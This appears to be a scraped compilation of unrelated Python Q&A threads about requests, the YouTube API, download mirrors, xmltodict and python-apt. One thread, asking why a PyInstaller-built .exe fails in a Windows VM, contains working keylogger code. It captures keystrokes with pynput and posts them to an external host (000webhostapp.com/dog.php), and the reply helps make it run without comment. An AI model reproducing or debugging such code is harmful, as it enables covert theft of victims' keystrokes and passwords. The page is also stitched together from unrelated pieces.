I am looking to alter the following code so as to run it on Python 2.x with BeautifulSoup 3.x:
import requests
import BeautifulSoup

session = requests.session()
pages = []
req = session.get('webpage')
content = req.content.split("</html>")
for page in content[:-1]:
    doc = BeautifulSoup.BeautifulSoup(page)
    name = doc.find('table', id='table2').find('table').findAll('td')[3].text
    print name
    tables = doc.findAll('table', id="conn")
    target_table = None
    for table in tables:
        try:
            title = table.find('thead').find('td').text
        except:
            title = None
        if title == 'ESME DETAILS':
            target_table = table
            break
    if target_table:
        esme_trs = target_table.find('tbody').findAll('tr')
        for tr in esme_trs:
            print "\t", tr.find('td').text
The problem is that requests is not installed in the Python 2.x installation, only for Python 3.x.
requests isn't part of the standard library, so it doesn't come bundled with Python; you need to install it manually.
See the instructions on the requests website for how to install it.
When setting up requests, either make Python 2.x your default Python installation, or install requests from source: instead of just running python setup.py install, run /path/to/python2.x setup.py install so that it installs into your 2.x instance.
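For example, a minimal sketch (assuming your 2.x interpreter lives at /usr/bin/python2.7 and ships with pip, i.e. 2.7.9 or later; adjust the path for your system):

/usr/bin/python2.7 -m pip install requests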
When I convert this code with PyInstaller and run it as an .exe in a Windows 10 VM, it prints an error.
import pynput
import requests
import json

key_count = 0
keys = []

def on_press(key):
    global key_count
    global keys
    keys.append(str(key))
    key_count += 1
    if key_count >= 10:
        key_count = 0
        send_keys()

def send_keys():
    data = json.dumps({'key_data': ''.join(keys)})
    headers = {'Content-type': 'application/json'}
    keys.clear()
    url = 'https://000webhostapp.com/dog.php'
    try:
        response = requests.post(url, data=data, headers=headers)
        response.raise_for_status()
    except requests.exceptions.RequestException as e:
        print(f'Error: {e}')
    else:
        print('Data sent successfully')

with pynput.keyboard.Listener(on_press=on_press) as listener:
    listener.join()
Need help. Thank you in advance.
I tried to force PyInstaller to include the module with a command-line option, but it didn't work; I don't know what to do.
Thank you.
As far as I can see from what you said, you are not using any virtualenv. You installed Python directly on your computer and started running the script.
The requests library is not one of the libraries that come with Python by default.
To install:
python -m pip install requests
For an answer to the question "What is virtualenv and how do I use it?", with the requests library as the example, see:
https://docs.python-guide.org/dev/virtualenvs/
I already tried your command, but it gives the same error. I used this command to convert the .py:
pyinstaller --onefile your_script_name.py
Thank you :)
I am following the tutorial found here: https://www.geeksforgeeks.org/youtube-data-api-set-1/. After I run the code below, I get a "No module named 'apiclient'" error. I also tried "from googleapiclient import discovery", but that gave an error as well. Does anyone have alternatives I can try?
I have already run pip install --upgrade google-api-python-client.
Would appreciate any help/suggestions!
Here is the code:
from apiclient.discovery import build

# Arguments that need to be passed to the build function
DEVELOPER_KEY = "your_API_Key"
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"

# creating YouTube Resource Object
youtube_object = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
                       developerKey=DEVELOPER_KEY)

def youtube_search_keyword(query, max_results):
    # calling the search.list method to
    # retrieve youtube search results
    search_keyword = youtube_object.search().list(q=query, part="id,snippet",
                                                  maxResults=max_results).execute()
    # extracting the results from search response
    results = search_keyword.get("items", [])

    # empty lists to store video,
    # channel, playlist metadata
    videos = []
    playlists = []
    channels = []

    # extracting required info from each result object
    for result in results:
        # video result object
        if result['id']['kind'] == "youtube#video":
            videos.append("%s (%s) (%s) (%s)" % (result["snippet"]["title"],
                          result["id"]["videoId"], result['snippet']['description'],
                          result['snippet']['thumbnails']['default']['url']))
        # playlist result object
        elif result['id']['kind'] == "youtube#playlist":
            playlists.append("%s (%s) (%s) (%s)" % (result["snippet"]["title"],
                             result["id"]["playlistId"],
                             result['snippet']['description'],
                             result['snippet']['thumbnails']['default']['url']))
        # channel result object
        elif result['id']['kind'] == "youtube#channel":
            channels.append("%s (%s) (%s) (%s)" % (result["snippet"]["title"],
                            result["id"]["channelId"],
                            result['snippet']['description'],
                            result['snippet']['thumbnails']['default']['url']))

    print("Videos:\n", "\n".join(videos), "\n")
    print("Channels:\n", "\n".join(channels), "\n")
    print("Playlists:\n", "\n".join(playlists), "\n")

if __name__ == "__main__":
    youtube_search_keyword('Geeksforgeeks', max_results=10)
With this information it's hard to say what the problem is. But I've sometimes been banging my head against the wall after installing something with pip (Python 2) and then trying to import the module in Python 3, or vice versa.
So if you are running your script with Python 3, try installing the package with pip3 install --upgrade google-api-python-client
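As a quick sanity check, this sketch only confirms which interpreter is running and that the package is importable from it (the import path is the one google-api-python-client itself ships):

import sys
print(sys.executable)  # the interpreter actually executing this script

# if this succeeds, the library is installed for this interpreter
from googleapiclient.discovery import build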
Try the YouTube docs here:
https://developers.google.com/youtube/v3/code_samples
They worked for me on a recently updated Slackware_64 14.2
I use them with Python 3.8. Since there may also be a version 2 of Python installed, I make sure to use this in the interpreter (shebang) line:
#!/usr/bin/python3.8
Likewise with pip, I use pip3.8 to install dependencies.
I installed Python from source; python3.8 --version reports Python 3.8.2.
You can also look at this video here:
https://www.youtube.com/watch?v=qDWtB2q_09g
It explains how to use YouTube's API Explorer, and you can copy code samples directly from there. The video covers Android, but the same concept applies when using the API Explorer from Python.
I concur with the previous answer regarding version control.
I'm currently using the following code to download a .gz file. The URL of the gz file is constructed from pieces of information provided by the user:
generalUrl = theWebsiteURL + "/" + packageName
So generalUrl can contain something like: http://www.example.com/blah-0.1.0.tar.gz
res = requests.get(generalUrl)
res.raise_for_status()
The problem I have here is that theWebsiteURL is actually a list of websites. I need to check all of these websites to see which ones have the package named in packageName available for download; I would prefer not to download the package during the confirmation.
Once the code has gone through the list and discovered which sites have the package, I want to pick the first website found to have it and automatically download the package from it.
Something like this:

#!/usr/bin/env python2.7
listOfWebsites = [ website1, website2, website3, website4, and so on ]
goodWebsites = []
for eachWebsite in listOfWebsites:
    genURL = eachWebsite + "/" + packageName
    res = requests.get(genURL)
    res.raise_for_status()
    if res.status_code == 200:
        goodWebsites.append(genURL)
This is where my imagination stops. I need assistance completing this. Not even sure I'm going about it the right way.
You can send a HEAD request first to check that the URL is valid, and only then download the package with a GET request:
#!/usr/bin/env python2.7
listOfWebsites = [ website1, website2, website3, website4, and so on ]
goodWebsites = []
for eachWebsite in listOfWebsites:
    genURL = eachWebsite + "/" + packageName
    res = requests.head(genURL)
    if res.ok:
        goodWebsites.append(genURL)
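To then grab the package from the first site that answered the HEAD request, a minimal sketch (streaming the body to disk so the archive is never held in memory in one piece):

if goodWebsites:
    res = requests.get(goodWebsites[0], stream=True)
    res.raise_for_status()
    # save under the package's own name in the current directory
    with open(packageName, 'wb') as f:
        for chunk in res.iter_content(chunk_size=8192):
            f.write(chunk)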
I'm trying, in Python 2.7 with the xmltodict extension, to get data from an App Engine API (XML type).
I have no idea how to do that...
I managed to do it with a local XML file (downloaded from the source URL).
My local code looks like this:
import xmltodict

document = open("my local path\API_GETDATA.xml", "r")
read_doc = document.read()
xml_doc = xmltodict.parse(read_doc)
for i in xml_doc:
    print (xml_doc[i])
and my result prints all of the XML fields.
How can I make it work on url? Is there any other thing I miss?
Use the Python library requests.
Install it with pip install requests and use it like this:

import requests
import xmltodict

r = requests.get("url")
xml_doc = xmltodict.parse(r.content)
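If the endpoint can fail, it may help to check the response before parsing. A sketch using only documented requests calls ("url" remains a placeholder for the real App Engine endpoint):

import requests
import xmltodict

r = requests.get("url")
r.raise_for_status()  # raises HTTPError for 4xx/5xx responses
xml_doc = xmltodict.parse(r.content)
for field in xml_doc:
    print(xml_doc[field])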
I've been using a combination of apt_pkg and apt libraries to obtain the following details from each package:
package.name
package.installedVersion
package.description
package.homepage
package.priority
I was able to obtain what I needed in the following manner, though I'm not entirely sure it's the best method of obtaining the results:
import apt_pkg, apt

def check_pkg_status(package):
    versions = package.VersionList
    version = versions[0]
    for other_version in versions:
        if apt_pkg.VersionCompare(version.VerStr, other_version.VerStr) < 0:
            version = other_version
    if package.CurrentVer:
        current = package.CurrentVer
        if apt_pkg.VersionCompare(current.VerStr, version.VerStr) < 0:
            return "upgradable"
        else:
            return "current"
    else:
        return "uninstalled"

apt_pkg.InitConfig()
apt_pkg.InitSystem()

aptpkg_cache = apt_pkg.GetCache() #Low level
apt_cache = apt.Cache() #High level
apt_cache.update()
apt_cache.open()

pkgs = {}
list_pkgs = []

for package in aptpkg_cache.Packages:
    try:
        #I use this to pass the pkg name from apt_pkg.Packages
        #to the high-level apt_cache, which allows me to obtain the
        #details I need. Is it better to just stick to one library here?
        #In other words, can I obtain this with just apt_pkg instead of using apt?
        selected_package = apt_cache[package.name]
        #Verify that the package can be upgraded
        if check_pkg_status(package) == "upgradable":
            pkgs["name"] = selected_package.name
            pkgs["version"] = selected_package.installedVersion
            pkgs["desc"] = selected_package.description
            pkgs["homepage"] = selected_package.homepage
            pkgs["severity"] = selected_package.priority
            list_pkgs.append(pkgs)
        else:
            print "Package: " + package.name + " does not exist"
            pass #Not upgradable?
    except:
        pass #This is one of the main reasons why I want to try a different method.
             #I'm using this try/except because there are a lot of times when
             #I pass package.name to apt_cache[] and get an error that the
             #package does not exist...
What is a good way of using apt_pkg/apt to get the details for each package that is a possible upgrade/update candidate?
The way I'm currently doing this, I only get updates/upgrades for packages already on the system, even though I've noticed that Debian's update manager shows me packages that I don't have on my system.
The following script is based on your Python code. It works on my Ubuntu 12.04 and should also work on any system with python-apt 0.8+:
import apt

apt_cache = apt.Cache() #High level
apt_cache.update()
apt_cache.open()

list_pkgs = []

for package_name in apt_cache.keys():
    selected_package = apt_cache[package_name]
    #Verify that the package can be upgraded
    if selected_package.isUpgradable:
        pkg = dict(
            name=selected_package.name,
            version=selected_package.installedVersion,
            desc=selected_package.description,
            homepage=selected_package.homepage,
            severity=selected_package.priority)
        list_pkgs.append(pkg)

print list_pkgs
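Note that newer python-apt releases replaced the camelCase attributes with snake_case properties; on such systems an equivalent sketch (the attribute names here are my assumption about the current python-apt API) would be:

import apt

apt_cache = apt.Cache()
apt_cache.open()

list_pkgs = []
for name in apt_cache.keys():
    pkg = apt_cache[name]
    if pkg.is_upgradable:                    # replaces isUpgradable
        list_pkgs.append(dict(
            name=pkg.name,
            version=pkg.installed.version,   # replaces installedVersion
            desc=pkg.candidate.description,
            homepage=pkg.candidate.homepage,
            severity=pkg.candidate.priority))

print(list_pkgs)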